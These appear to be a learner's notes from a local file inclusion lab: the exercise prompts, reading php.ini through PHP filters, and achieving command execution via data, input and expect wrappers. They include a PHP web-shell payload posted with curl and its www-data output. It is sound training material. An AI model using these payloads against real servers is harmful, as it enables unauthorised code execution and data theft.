
Using the file inclusion find the name of a user on the system that starts with "b".


Submit the contents of the flag.txt file located in the /usr/share/flags directory.

The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt

File Disclosure via PHP filters

To check for PHP configurations at /etc/php/X.Y/apache2/php.ini for Apache and /etc/php/X.Y/fpm/php.ini for Nginx.

curl ""

echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep allow_url_include
or decode in base64 decoder and search for allow_url_include
allow_url_include = On

RCE with allow-url_include On:

Data Wrapper method:


Go to burpsuite, and enter the payload in LFI parameter lang

Input method:

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "" | grep uid

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Expect method:

Grep for expect after finding out php.ini source code


curl -s ""

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